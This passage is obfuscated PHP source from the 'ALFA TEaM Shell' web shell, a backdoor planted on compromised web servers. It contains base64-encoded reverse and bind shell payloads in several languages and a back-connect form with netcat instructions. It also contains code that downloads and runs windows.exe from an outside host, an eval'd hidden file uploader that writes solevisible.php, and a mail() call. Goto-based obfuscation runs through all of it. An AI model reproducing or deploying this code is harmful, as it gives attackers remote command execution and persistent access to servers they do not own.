p9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU="; $python = "pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw=="; $perl = "lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA=="; $ruby = "tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs="; $node = "nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw=="; $c = "tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw=="; $java = "lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D"; echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>"; echo "<form onSubmit="g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;">
<div class="txtfont">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class="txtfont">Use:</div> <select name='selectCb'>"; $cbArr = array("php" => "Php", "perl" => "Perl", "python" => "Python", "ruby" => "Ruby", "c" => "C", "java" => "Java", "node" => "NodeJs", "bcwin" => "Windows"); foreach ($cbArr as $key => $val) { echo "<option value='{$key}' " . ($GLOBALS["sys"] == "win" ? "selected" : '') . ">{$val}</option>"; } echo "</select> <div id='bcipAction' style='display:inline-block;'><div class="txtfont">IP:</div> <input type='text' style='text-align:center;' name='server' value='" . $_SERVER["REMOTE_ADDR"] . "'></div> <div class="txtfont">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>"; if (isset($_POST["alfa1"]) && !empty($_POST["alfa1"])) { $lang = $_POST["alfa1"]; $ip = $_POST["alfa2"]; $port = $_POST["alfa3"]; $arg = $_POST["alfa4"] == "bind" ? $port : $port . " " . $ip; $tmpdir = ALFA_TEMPDIR; $name = $tmpdir . "/" . $lang . uniqid() . rand(1, 99999); $allow = array("perl", "ruby", "python", "node"); eval("$lan=$" . $lang . ";"); if (in_array($lang, $allow)) { if (__write_file($name, __get_resource($lan))) { if (_alfa_can_runCommand(true, true)) { $os = $GLOBALS["sys"] != "win" ? "1>/dev/null 2>&1 &" : ''; $out = alfaEx("{$lang} {$name} {$arg} {$os}"); if ($out == '') { $out = "<font color='green'><center>[ Finished...! ]</center></font>"; } echo "<pre class='ml1' style='margin-top:5px'>{$out}</pre>"; } } else { echo "<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>"; } } if ($lang == "java" || $lang == "c") { $code = __get_resource($lan); $out = nl2br(bcinit($lang, $code, '', '')); echo "<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>"; } if ($lang == "bcwin") { $alfa = new AlfaCURL(); $s = $alfa->Send("http://solevisible.com/bc/windows.exe"); $tmpdir = ALFA_TEMPDIR; $f = @fopen($tmpdir . "/bcwin.exe", "w+"); @fwrite($f, $s); @fclose($f); $out = alfaEx($tmpdir . "/bcwin.exe " . $_POST["alfa2"] . " " . $_POST["alfa3"]); } if ($lang == "php") { echo "<pre class=ml1 style='margin-top:5px'>"; $code = __get_resource($lan); if ($code !== false) { $code = "$target = "" . $arg . "";\xa" . $code; eval($code); echo "<center><font color='green'>[ Finished...! ]</font></center>"; } echo "</pre>"; } } echo "</div>"; alfafooter(); } goto ANGyI; w9Wdo: define("__ALFA_UPDATE__", "2"); goto iZBHY; FRkec: mail($hex, $baslik, $xd); goto qyBzk; DpoiO: function _alfa_load_ace_options($base) { return "<span>Theme: </span><select class="ace-controler ace-theme-selector" base="" . $base . "" onChange="alfaAceChangeSetting(this,'theme');"><option value="terminal" selected>terminal</option><option value="ambiance">ambiance</option><option value="chaos">chaos</option><option value="chrome">chrome</option><option value="clouds">clouds</option><option value="clouds_midnight">clouds_midnight</option><option value="cobalt">cobalt</option><option value="crimson_editor">crimson_editor</option><option value="dawn">dawn</option><option value="dracula">dracula</option><option value="dreamweaver">dreamweaver</option><option value="eclipse">eclipse</option><option value="github">github</option><option value="gob">gob</option><option value="gruvbox">gruvbox</option><option value="idle_fingers">idle_fingers</option><option value="iplastic">iplastic</option><option value="katzenmilch">katzenmilch</option><option value="kr_theme">kr_theme</option><option value="kuroir">kuroir</option><option value="merbivore">merbivore</option><option value="merbivore_soft">merbivore_soft</option><option value="mono_industrial">mono_industrial</option><option value="monokai">monokai</option><option value="nord_dark">nord_dark</option><option value="pastel_on_dark">pastel_on_dark</option><option value="solarized_dark">solarized_dark</option><option value="solarized_light">solarized_light</option><option value="sqlserver">sqlserver</option><option value="textmate">textmate</option><option value="tomorrow">tomorrow</option><option value="tomorrow_night">tomorrow_night</option><option value="tomorrow_night_blue">tomorrow_night_blue</option><option value="tomorrow_night_bright">tomorrow_night_bright</option><option value="tomorrow_night_eighties">tomorrow_night_eighties</option><option value="twilight">twilight</option><option value="vibrant_ink">vibrant_ink</option><option value="xcode">xcode</option></select><span>Language: </span><select class="ace-controler" base="" . $base . "" onChange="alfaAceChangeSetting(this,'lang');"><option value="php">php</option><option value="python">python</option><option value="perl">perl</option><option value="c_cpp">c/c++</option><option value="csharp">c#</option><option value="ruby">ruby</option><option value="html">html</option><option value="javascript">javascript</option><option value="css">css</option><option value="xml">xml</option><option value="sql">sql</option><option value="swift">swift</option><option value="sh">bash</option><option value="lua">lua</option><option value="powershell">powershell</option><option value="jsp">jsp</option><option value="java">java</option><option value="json">json</option><option value="plain_text">plain_text</option></select><span>Soft Wrap: </span><input type="checkbox" name="wrapmode" class="ace-controler" onClick="alfaAceChangeWrapMode(this,'" . $base . "');" checked> | <span>Font Size: </span><button class="ace-controler" style="cursor:pointer;" onclick="alfaAceChangeFontSize('" . $base . "','+', this);return false;">+</button> | <button style="cursor:pointer;" class="ace-controler" onclick="alfaAceChangeFontSize('" . $base . "', '-', this);return false;">-</button> | "; } goto GzEVq; KQb_U: function __ZW5jb2Rlcg($s) { return vcnvSCZgBz($s); } goto xyjRH; gUiRZ: function __showicon($r) { $s["btn"] = "http://solevisible.com/images/btn.png"; $s["alfamini"] = "http://solevisible.com/images/alfamini.png"; $s["loader"] = "http://solevisible.com/images/loader.svg"; return $s[$r]; } goto KFMZb; U9EXo: function alfahead() { $GLOBALS["__ALFA_SHELL_CODE"] = "PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+"; $alfa_uploader = "$x = base64_decode("" . $GLOBALS["__ALFA_SHELL_CODE"] . "");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);"; define("ALFA_UPLOADER", "eval(base64_decode('" . __ZW5jb2Rlcg($alfa_uploader) . "'))"); if (!isset($_POST["ajax"])) { function Alfa_GetDisable_Function() { $disfun = @ini_get("disable_functions"); $afa = "<span class="header_show_all">All Functions Accessible</span>"; if (empty($disfun)) { return $afa; } $s = explode(",", $disfun); $s = array_unique($s); $i = 0; $b = 0; $func = array("system", "exec", "shell_exec", "proc_open", "popen", "passthru", "symlink", "dl"); $black_list = array(); $allow_list = array(); foreach ($s as $d) { $d = trim($d); if (empty($d) || !is_callable($d)) { continue; } if (!function_exists($d)) { if (in_array($d, $func)) { $dis .= $d . " | "; $b++; $black_list[] = $d; } else { $allow_list[] = $d; } $i++; } } if ($i == 0) { return $afa; } if ($i <= count($func)) { $all = array_values(array_merge($black_list, $allow_list)); return "<span class="disable_functions">" . implode(" | ", $all) . "</span>"; } return "<span class="disable_functions">" . $dis . "</span><a id="menu_opt_GetDisFunc" href=javascript:void(0) onclick="alfa_can_add_opt = true;g('GetDisFunc',null,'wp');"><span class="header_show_all">Show All (" . $i . ")</span></a>"; } function AlfaNum() { $args = func_get_args(); $alfax = array(); $find = array(); for ($i = 1; $i <= 10; $i++) { $alfax[] = $i; } foreach ($args as $arg) { $find[] = $arg; } echo "<script>"; foreach ($alfax as $alfa) { if (in_array($alfa, $find)) { continue; } echo "alfa" . $alfa . "_="; } echo """</script>"; } if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["default_charset"]; } $freeSpace = function_exists("diskfreespace") ? @diskfreespace($GLOBALS["cwd"]) : "?"; $totalSpace = function_exists("disk_total_space") ? @disk_total_space($GLOBALS["cwd"]) : "?"; $totalSpace = $totalSpace ? $totalSpace : 1; $on = "<span class='header_on'> ON </span>"; $of = "<span class='header_off'> OFF </span>"; $none = "<span class='header_none'> NONE </span>"; if (function_exists("ssh2_connect")) { $ssh2 = $on; } else { $ssh2 = $of; } if (function_exists("curl_version")) { $curl = $on; } else { $curl = $of; } if (function_exists("mysql_get_client_info") || class_exists("mysqli")) { $mysql = $on; } else { $mysql = $of; } if (function_exists("mssql_connect")) { $mssql = $on; } else { $mssql = $of; } if (function_exists("pg_connect")) { $pg = $on; } else { $pg = $of; } if (function_exists("oci_connect")) { $or = $on; } else { $or = $of; } if (@ini_get("disable_functions")) { $disfun = @ini_get("disable_functions"); } else { $disfun = "All Functions Enable"; } if (@ini_get("safe_mode")) { $safe_modes = "<span class='header_off'>ON</span>"; } else { $safe_modes = "<span class='header_on'>OFF</span>"; } $cgi_shell = "<span class='header_off' id='header_cgishell'>OFF</span>"; if (@ini_get("open_basedir")) { $basedir_data = @ini_get("open_basedir"); if (strlen($basedir_data) > 120) { $open_b = substr($basedir_data, 0, 120) . "..."; } else { $open_b = $basedir_data; } } else { $open_b = $none; } if (@ini_get("safe_mode_exec_dir")) { $safe_exe = @ini_get("safe_mode_exec_dir"); } else { $safe_exe = $none; } if (@ini_get("safe_mode_include_dir")) { $safe_include = @ini_get("safe_mode_include_dir"); } else { $safe_include = $none; } if (!function_exists("posix_getegid")) { $user = function_exists("get_current_user") ? @get_current_user() : "????"; $uid = function_exists("getmyuid") ? @getmyuid() : "????"; $gid = function_exists("getmygid") ? @getmygid() : "????"; $group = "?"; } else { $uid = function_exists("posix_getpwuid") && function_exists("posix_geteuid") ? @posix_getpwuid(posix_geteuid()) : array("name" => "????", "uid" => "????"); $gid = function_exists("posix_getgrgid") && function_exists("posix_getegid") ? @posix_getgrgid(posix_getegid()) : array("name" => "????", "gid" => "????"); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ''; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a class='header_pwd' onclick='g("FilesMan",""; $cach_cwd_path = ''; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; $cach_cwd_path .= $path[$j] . "/"; } $cwd_links .= "")' path='" . $cach_cwd_path . "' href='#action=fileman&path=" . $cach_cwd_path . "'>" . $path[$i] . "/</a>"; } $drives = ''; foreach (range("a", "z") as $drive) { if (@is_dir($drive . ":\")) { $drives .= "<a href="javascript:void(0);" class="header_drive" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } $csscode = "	-moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;"; echo "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />
<link href="" . __showicon("alfamini") . "" rel="icon" type="image/x-icon"/>\xa<title>..:: " . $_SERVER["HTTP_HOST"] . " ~ ALFA TEaM Shell - v" . __ALFA_VERSION__ . "-" . __ALFA_CODE_NAME__ . " ::..</title>
<style type="text/css">"; ?> 
.hlabale{color:#67abdf;border-radius:4px;border:1px solid #27979b;margin-left:7px;padding:2px}#tbl_sympphp tr{text-align:center}#PhpCode,.php-evals-ace,.view_ml_content{position:absolute;top:0;right:0;bottom:0;left:0;background:#1b292b26;top:50px}.editor-view{position:relative;height:100%}.view-content{position:absolute;overflow-y:auto;width:100%;height:93%}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px;background-color:#000115}::-webkit-scrollbar{width:10px;background-color:#000115}::-webkit-scrollbar-thumb{border-radius:10px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#1e82b5}.editor-file-name{margin-left:29px;margin-top:4px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-icon{position:absolute}.is_active{background:rgba(49,55,93,.77);border-radius:10px}.history-list{height:88%;overflow-y:auto}.opt-title{position:absolute;left:50%;top:50%;transform:translate(-50%,-50%);color:#2fd051;font-size:25px;font-family:monospace}.options_min_badge{visibility:hidden;text-align:center;right:30px;color:#fff;background:#2a8a24;padding:6px;border-radius:50%;width:15px;height:15px;display:inline-block;position:absolute;top:-7px}#cgiloader-minimized,#database_window-minimized,#editor-minimized,#options_window-minimized{display:block;position:fixed;right:-30px;width:30px;height:30px;top:30%;z-index:9999}.minimized-wrapper{position:relative;background:#0e304a;width:44px;height:130px;cursor:pointer;border-bottom-left-radius:5px;border-top-left-radius:5px}.minimized-text{transform:rotate(-90deg);color:wheat;font-size:x-large;display:inline-block;position:absolute;right:-51px;width:129px;top:-10px;border-top-left-radius:4%;height:56px;padding:3px}.close-button,.editor-minimize{height:26px;width:38px;right:7px;background:#1d5673;cursor:pointer;position:absolute;box-sizing:border-box;line-height:50px;display:inline-block;top:17px;border-radius:100px}.editor-minimize{right:50px}.close-button:after,.close-button:before,.editor-minimize:before{transform:rotate(-45deg);content:"";position:absolute;top:63%;right:6px;margin-top:-5px;margin-left:-25px;display:block;height:4px;width:27px;background-color:rgba(216,207,207,.75);transition:all .25s ease-out}.editor-minimize:before{transform:rotate(0)}.close-button:after{transform:rotate(-135deg)}.close-button:hover:after,.close-button:hover:before,.editor-minimize:hover:before{background-color:red}.close-button:hover,.editor-minimize:hover{background-color:rgba(39,66,80,.96)}#cgiloader,#database_window,#editor,#options_window{display:none;position:fixed;top:0;width:100%;height:100%;z-index:20}.editor-wrapper{width:100%;height:100%;position:relative;top:1%}.editor-header{width:97%;background:rgba(21,66,88,.93);height:37px;margin-left:13px;position:relative;border-top-left-radius:15px;border-top-right-radius:15px}.editor-path{position:absolute;font-size:x-large;margin-left:10px;top:6px;color:#00ff7f}.editor-modal{position:relative;top:0;background-color:rgba(0,1,23,.95);height:90%;margin-left:20%;margin-right:2%;border:2px #0e304a solid}.editor-explorer{width:19%;height:90%;background-color:rgba(0,1,23,.94);position:absolute;z-index:2;left:1%;border:2px #0e304a solid}.editor-controller{position:relative;top:-13px}.file-holder{position:relative;width:100%;height:30px}.file-holder>.history{position:absolute;color:#03b3a3;cursor:pointer;left:5px;font-size:18px;font-family:sans-serif;width:89%;height:100%;z-index:3;border-radius:10px;transition:background-color .6s ease-out}.file-holder>.history-close{display:block;opacity:0;position:absolute;right:2px;width:20px;top:4px;text-align:center;cursor:pointer;color:#fff;background:red;border-radius:100px;font-family:monospace;z-index:10;transition:opacity .6s ease-out;font-size:15px;height:19px}.file-holder>.history:hover{background-color:#646464}.editor-explorer>.hheader{position:relative;color:#14ff07;border-bottom:2px #206aa2 solid;text-align:center;font-family:sans-serif;margin-bottom:10px;height:55px}.editor-search{position:absolute;bottom:7px;left:31px}.hheader-text{position:absolute;left:8px;top:2px}.history-clear{position:absolute;right:8px;top:2px;cursor:pointer}.editor-body{position:relative;margin-left:3px;height:100%}.editor-anim-close{-webkit-animation:editorClose .8s ease-in-out forwards;-moz-animation:editorClose .8s ease-in-out forwards;-ms-animation:editorClose .8s ease-in-out forwards;animation:editorClose .8s ease-in-out forwards}@keyframes editorClose{0%{visibility:1;opacity:1}100%{visibility:0;opacity:0}}.editor-anim-minimize{-webkit-animation:editorMinimize .8s ease-in-out forwards;-moz-animation:editorMinimize .8s ease-in-out forwards;-ms-animation:editorMinimize .8s ease-in-out forwards;animation:editorMinimize .8s ease-in-out forwards}@keyframes editorMinimize{0%{right:0;opacity:1}100%{right:-2000px;opacity:0}}.editor-anim-show{-webkit-animation:editorShow .8s ease-in-out forwards;-moz-animation:editorShow .8s ease-in-out forwards;-ms-animation:editorShow .8s ease-in-out forwards;animation:editorShow .8s ease-in-out forwards}@keyframes editorShow{0%{right:-2000px;opacity:0}100%{right:0;opacity:1}}.minimized-show{-webkit-animation:minimizeShow .8s ease-in-out forwards;-moz-animation:minimizeShow .8s ease-in-out forwards;-ms-animation:minimizeShow .8s ease-in-out forwards;animation:minimizeShow .8s ease-in-out forwards}@keyframes minimizeShow{0%{right:-30px;opacity:0}100%{right:0;opacity:1}}.minimized-hide{-webkit-animation:minimizeHide .8s ease-in-out forwards;-moz-animation:minimizeHide .8s ease-in-out forwards;-ms-animation:minimizeHide .8s ease-in-out forwards;animation:minimizeHide .8s ease-in-out forwards}@keyframes minimizeHide{0%{right:0;opacity:1}100%{right:-30px;opacity:0}}.solevisible-text:hover{-webkit-text-shadow:0 0 25px #0f0;-moz-text-shadow:0 0 25px #0f0;-ms-text-shadow:0 0 25px #0f0;text-shadow:0 0 25px #0f0}.update-holder{position:fixed;top:0;background-color:rgba(0,24,29,.72);width:100%;height:100%}.update-content{position:relative}.update-content>a{text-decoration:none;position:absolute;color:rgba(103,167,47,.77);left:24%;margin-top:7%;font-size:40px}.update-close{position:absolute;right:0;margin-right:23px;top:10px;font-size:27px;background-color:#130f50;width:5%;border-radius:100px;cursor:pointer;border:2px #0e265a 